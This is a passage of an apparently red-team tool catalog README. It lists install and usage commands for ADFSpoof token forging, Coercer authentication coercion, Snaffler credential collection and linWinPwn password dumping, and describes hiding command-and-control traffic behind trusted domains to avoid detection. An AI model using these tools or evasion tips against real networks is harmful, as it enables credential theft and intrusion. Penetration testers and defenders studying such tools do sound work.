signing.\u003c/li\u003e\n\u003cli\u003eGiven a signing key, produce a signed security token that can be used to access a federated application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eThis tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eADFSpoof requires the installation of a custom fork of the Python Cryptography package, available \u003ca href=\"https://github.com/dmb2168/cryptography\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/mandiant/ADFSpoof\npip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/mandiant/ADFSpoof\npip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Decrypt the EncryptedPFX and write to disk\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n# Generate a security token for Office365\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Decrypt the EncryptedPFX and write to disk\u003c/span\u003e\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate a security token for Office365\u003c/span\u003e\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/mandiant/ADFSpoof#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAdditional command examples can be found \u003ca href=\"https://github.com/mandiant/ADFSpoof#examples\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/mandiant/ADFSpoof#usage\"\u003ehttps://github.com/mandiant/ADFSpoof#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/p0dalirius/Coercer\"\u003eCoercer\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-coercer\" class=\"anchor\" aria-label=\"Permalink: 🔙Coercer\" href=\"#coercer\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)\u003c/li\u003e\n\u003cli\u003eTries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)\u003c/li\u003e\n\u003cli\u003eCalls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.\u003c/li\u003e\n\u003cli\u003eRandom UNC paths generation to avoid caching failed attempts (all modes)\u003c/li\u003e\n\u003cli\u003eConfigurable delay between attempts with --delay\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eMore feature information \u003ca href=\"https://github.com/p0dalirius/Coercer#features\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo python3 -m pip install coercer\"\u003e\u003cpre\u003esudo python3 -m pip install coercer\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Scan mode (Assess the Remote Procedure Calls listening on a machine)\n./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)\n./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)\n./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan mode (Assess the Remote Procedure Calls listening on a machine)\u003c/span\u003e\n./Coercer.py scan -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)\u003c/span\u003e\n./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)\u003c/span\u003e\n./Coercer.py fuzz -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/p0dalirius/Coercer#quick-start\"\u003ehttps://github.com/p0dalirius/Coercer#quick-start\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCollection\u003c/h1\u003e\u003ca id=\"user-content-collection\" class=\"anchor\" aria-label=\"Permalink: Collection\" href=\"#collection\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/BloodHoundAD/BloodHound\"\u003eBloodHound\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-bloodhound\" class=\"anchor\" aria-label=\"Permalink: 🔙BloodHound\" href=\"#bloodhound\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAn application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/\" rel=\"nofollow\"\u003ePenTestPartners Walkthrough\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCustom Queries:\u003c/strong\u003e \u003ca href=\"https://github.com/CompassSecurity/BloodHoundQueries\"\u003eCompassSecurity BloodHoundQueries\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SnaffCon/Snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-snaffler\" class=\"anchor\" aria-label=\"Permalink: 🔙Snaffler\" href=\"#snaffler\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSnaffler is an advanced credential scanner/collector for Active Directory environments. \u003cem\u003eWith a great \u003ca href=\"https://github.com/SnaffCon/Snaffler/blob/master/README.md\"\u003eREADME\u003c/a\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSnaffler uses a system of \"classifiers\", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eMore information about Snaffler \u003ca href=\"https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset\"\u003erules\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e'\u003cem\u003eBroadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.\u003c/em\u003e' - Snaffler README (2023)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download the binary from the \u003ca href=\"https://github.com/SnaffCon/Snaffler/releases\"\u003eGitHub Releases Page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Targeted local scan (less likely to trigger detections)\nSnaffler.exe -s -i C:\\\n\n# Go in loud and find everything\nsnaffler.exe -s -o snaffler.log\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Targeted local scan (less likely to trigger detections)\u003c/span\u003e\nSnaffler.exe -s -i C:\\\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Go in loud and find everything\u003c/span\u003e\nsnaffler.exe -s -o snaffler.log\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/SnaffCon/Snaffler#what-does-it-look-like\"\u003ehttps://github.com/SnaffCon/Snaffler#what-does-it-look-like\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/lefayjey/linWinPwn\"\u003elinWinPwn\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linwinpwn\" class=\"anchor\" aria-label=\"Permalink: 🔙linWinPwn\" href=\"#linwinpwn\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003elinWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003elinWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/lefayjey/linWinPwn\ncd linWinPwn; chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\"\u003e\u003cpre\u003egit clone https://github.com/lefayjey/linWinPwn\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e linWinPwn\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Default: interactive - Open interactive menu to run checks separately\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; [-d \u0026lt;AD_domain\u0026gt; -u \u0026lt;AD_user\u0026gt; -p \u0026lt;AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u0026gt; -o \u0026lt;output_dir\u0026gt;]\n\n# Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; --auto-config\n\n# LDAPS - Use LDAPS instead of LDAP (port 636)\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; --ldaps\n\n# Module pwd_dump: Password Dump\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; -M pwd_dump [-d \u0026lt;AD_domain\u0026gt; -u \u0026lt;AD_user\u0026gt; -p \u0026lt;AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u0026gt; -o \u0026lt;output_dir\u0026gt;]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Default: interactive - Open interactive menu to run checks separately\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_domain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-u\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_user\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-p\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-o\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eoutput_dir\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e --auto-config\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e LDAPS - Use LDAPS instead of LDAP (port 636)\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e --ldaps\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Module pwd_dump: Password Dump\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -M pwd_dump [-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_domain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-u\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_user\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-p\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-o\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eoutput_dir\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information \u003ca href=\"https://github.com/lefayjey/linWinPwn#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/lefayjey/linWinPwn#demos\"\u003ehttps://github.com/lefayjey/linWinPwn#demos\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCommand and Control\u003c/h1\u003e\u003ca id=\"user-content-command-and-control\" class=\"anchor\" aria-label=\"Permalink: Command and Control\" href=\"#command-and-control\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-living-off-trusted-sites-project\" class=\"anchor\" aria-label=\"Permalink: 🔙Living Off Trusted Sites Project\" href=\"#living-off-trusted-sites-project\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eC2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBeing able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis resource contains a list of trusted 